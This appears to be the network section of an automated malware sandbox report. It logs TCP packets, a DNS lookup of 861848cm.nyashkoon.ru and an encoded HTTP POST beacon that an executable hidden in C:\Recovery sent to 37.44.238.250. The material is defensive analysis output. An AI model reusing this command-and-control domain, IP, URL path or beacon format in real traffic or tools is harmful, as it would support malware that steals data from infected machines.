                                                                    Nov 6, 2024 03:39:20.189749002 CET5014180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.190671921 CET5014280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.195524931 CET805014237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.195583105 CET5014280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.195708036 CET5014280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.200463057 CET805014237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.241575003 CET805014137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.308139086 CET5014380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.312916040 CET805014337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.313097000 CET5014380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.313220978 CET5014380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.317971945 CET805014337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.547849894 CET5014280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.552649021 CET805014237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.552874088 CET805014237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.657107115 CET5014380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.661958933 CET805014337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.720101118 CET805014137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.720220089 CET5014180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.008579969 CET805014237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:21.063304901 CET5014280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.085596085 CET805014237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:21.138801098 CET805014337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:21.175404072 CET5014280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.208465099 CET805014337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:21.211455107 CET5014380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.338223934 CET5014280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.338279009 CET5014380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.339003086 CET5014480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.343482018 CET805014237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:21.343530893 CET5014280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.343882084 CET805014437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:21.343935966 CET5014480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.344024897 CET5014480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.344373941 CET805014337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:21.344420910 CET5014380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.348752022 CET805014437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:21.688318014 CET5014480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:21.693173885 CET805014437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:22.162271023 CET805014437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:22.235414982 CET5014480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:22.241113901 CET805014437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:22.356236935 CET5014580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:22.356240034 CET5014480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:22.361120939 CET805014537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:22.362673044 CET805014437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:22.363459110 CET5014480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:22.363508940 CET5014580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:22.367409945 CET5014580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:22.372215033 CET805014537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:22.719623089 CET5014580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:22.724555969 CET805014537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:23.208024979 CET805014537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:23.276576042 CET5014580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:23.283559084 CET805014537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:23.378293037 CET5014580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:23.405244112 CET5014580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:23.405750036 CET5014680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:23.410806894 CET805014537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:23.410819054 CET805014637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:23.410856009 CET5014580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:23.410904884 CET5014680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:23.411006927 CET5014680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:23.415765047 CET805014637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:23.766638041 CET5014680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:23.771729946 CET805014637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:24.212655067 CET805014637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:24.284620047 CET805014637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:24.291517019 CET5014680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:24.402812004 CET5014680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:24.402836084 CET5014780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:24.407710075 CET805014737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:24.408174038 CET805014637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:24.408272982 CET5014680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:24.408276081 CET5014780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:24.408421993 CET5014780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:24.413160086 CET805014737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:24.766494036 CET5014780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:24.771498919 CET805014737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:25.253020048 CET805014737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:25.327613115 CET805014737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:25.327671051 CET5014780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:25.457660913 CET5014780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:25.458167076 CET5014880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:25.462883949 CET805014737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:25.462938070 CET5014780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:25.462939024 CET805014837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:25.463000059 CET5014880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:25.463128090 CET5014880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:25.467844963 CET805014837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:25.813399076 CET5014880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:25.818425894 CET805014837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.095752001 CET5014980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:26.095985889 CET5014880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:26.100590944 CET805014937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.100681067 CET5014980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:26.100739002 CET5014980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:26.101264954 CET805014837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.101311922 CET5014880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:26.105448961 CET805014937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.263416052 CET5015080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:26.268220901 CET805015037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.271538973 CET5015080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:26.271538973 CET5015080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:26.276313066 CET805015037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.455411911 CET5014980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:26.460294008 CET805014937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.460642099 CET805014937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.625874043 CET5015080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:26.630742073 CET805015037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.907964945 CET805014937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.982861996 CET805014937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:26.982988119 CET5014980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:27.086781025 CET805015037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:27.155023098 CET805015037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:27.155440092 CET5015080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:27.282341003 CET5014980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:27.282711983 CET5015080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:27.283123970 CET5015180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:27.287760019 CET805014937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:27.287813902 CET5014980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:27.287861109 CET805015137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:27.287919998 CET5015180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:27.288026094 CET5015180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:27.288192987 CET805015037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:27.288237095 CET5015080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:27.292795897 CET805015137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:27.641611099 CET5015180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:27.646420002 CET805015137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:28.098757029 CET805015137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:28.166906118 CET805015137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:28.166955948 CET5015180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:28.292517900 CET5015280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:28.297311068 CET805015237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:28.299453020 CET5015280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:28.299556971 CET5015280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:28.304258108 CET805015237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:28.659455061 CET5015280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:28.664344072 CET805015237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:29.146776915 CET805015237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:29.219271898 CET805015237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:29.219481945 CET5015280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:29.359590054 CET5015180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:29.365952969 CET5015280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:29.366646051 CET5015380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:29.371032953 CET805015237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:29.371088982 CET5015280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:29.371470928 CET805015337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:29.371541023 CET5015380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:29.371623039 CET5015380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:29.376418114 CET805015337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:29.719603062 CET5015380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:29.724416018 CET805015337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:30.174763918 CET805015337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:30.253245115 CET805015337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:30.259551048 CET5015380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:30.410525084 CET5015380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:30.411137104 CET5015480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:30.415853977 CET805015337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:30.416198969 CET805015437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:30.416275024 CET5015380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:30.416382074 CET5015480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:30.416382074 CET5015480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:30.421196938 CET805015437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:30.766526937 CET5015480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:30.771899939 CET805015437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:31.236835003 CET805015437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:31.319130898 CET5015480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:31.323147058 CET805015437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:31.455514908 CET5015480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:31.455887079 CET5015580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:31.460694075 CET805015537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:31.460758924 CET5015580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:31.460841894 CET5015580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:31.460995913 CET805015437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:31.461087942 CET5015480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:31.465555906 CET805015537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:31.813360929 CET5015580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:31.818289042 CET805015537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:31.986313105 CET5015680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:31.986541033 CET5015580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:32.153481007 CET5015780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:32.227106094 CET805015637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:32.227133989 CET805015737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:32.227210999 CET805015537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:32.227216959 CET5015680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:32.227250099 CET5015780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:32.227281094 CET5015580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:32.227446079 CET5015680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:32.227725983 CET5015780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:32.232208014 CET805015637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:32.232487917 CET805015737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:32.578999996 CET5015780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:32.578998089 CET5015680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:32.584944963 CET805015737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:32.584959030 CET805015637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:32.584968090 CET805015637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.039164066 CET805015637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.062787056 CET805015737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.118026018 CET805015637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.119488001 CET5015680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.126271009 CET5015780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.165800095 CET805015737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.235409021 CET5015780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.279975891 CET5015680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.280113935 CET5015780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.280769110 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.285135031 CET805015637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.285183907 CET5015680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.285511017 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.285568953 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.285727024 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.288460970 CET805015737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.288508892 CET5015780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.290807962 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:33.641588926 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:33.646447897 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.108486891 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.182740927 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.182831049 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.307421923 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.311402082 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.316369057 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.319565058 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.319565058 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.322829962 CET805015837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.324471951 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:34.324500084 CET5015880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.675441027 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:34.680294037 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.141043901 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.216519117 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.219490051 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.342608929 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.343472958 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.347711086 CET805015937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.347757101 CET5015980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.348248959 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.348306894 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.348490953 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.353281021 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:35.704008102 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:35.929568052 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.159209013 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.230046034 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.230102062 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.355643034 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.355652094 CET5011780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.356204033 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.675410032 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.679747105 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.679760933 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.679847002 CET5016080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.679893970 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.680092096 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:36.681309938 CET805016037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:36.684840918 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.032151937 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.037065983 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.484128952 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.558568954 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.558635950 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.688064098 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.688415051 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.693221092 CET805016137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.693234921 CET805016237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:37.693272114 CET5016180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.693407059 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.693464041 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:37.698209047 CET805016237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.047738075 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.052617073 CET805016237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.127202034 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.127305031 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.132230997 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.132308006 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.132415056 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.137484074 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.173700094 CET805016237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.244748116 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.249732971 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.255661964 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.255661964 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.260704994 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.276395082 CET805016237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.279746056 CET5016280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.487535954 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.492530107 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.492631912 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.611430883 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:38.616535902 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:38.934139013 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.015396118 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.015762091 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.066546917 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.127435923 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.143737078 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.235230923 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.264930964 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.264992952 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.265889883 CET5016580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.270095110 CET805016337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.270153046 CET5016380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.270376921 CET805016437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.270462036 CET5016480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.270682096 CET805016537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:39.270751953 CET5016580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.270864964 CET5016580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:39.275614977 CET805016537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:40.082228899 CET805016537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:40.172682047 CET5016580192.168.2.437.44.238.250

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 6, 2024 03:37:14.510160923 CET6179753192.168.2.41.1.1.1
                                                                    Nov 6, 2024 03:37:14.641803026 CET53617971.1.1.1192.168.2.4

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Nov 6, 2024 03:37:14.510160923 CET192.168.2.41.1.1.10x3d20Standard query (0)861848cm.nyashkoon.ruA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Nov 6, 2024 03:37:14.641803026 CET1.1.1.1192.168.2.40x3d20No error (0)861848cm.nyashkoon.ru37.44.238.250A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • 861848cm.nyashkoon.ru

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.44973037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:14.656441927 CET296OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 344
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:15.004076004 CET344OUTData Raw: 00 06 01 07 06 0d 01 03 05 06 02 01 02 01 01 02 00 0b 05 09 02 02 03 0d 01 03 0c 04 03 07 00 08 0c 03 06 00 07 06 07 06 0e 04 04 02 06 03 05 00 06 01 0c 5c 0d 01 01 00 07 07 04 50 07 0b 04 08 01 00 0d 5a 06 03 07 05 0d 57 0c 53 0f 54 0c 51 05 01
                                                                    Data Ascii: \PZWSTQWT\L}RkpPN`\~]alO||[wU|]xKx|`_opy[km`Ntt`L}u~V@xmPN~\e
                                                                    Nov 6, 2024 03:37:15.500901937 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:15.592390060 CET1236INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 1364
                                                                    Connection: keep-alive
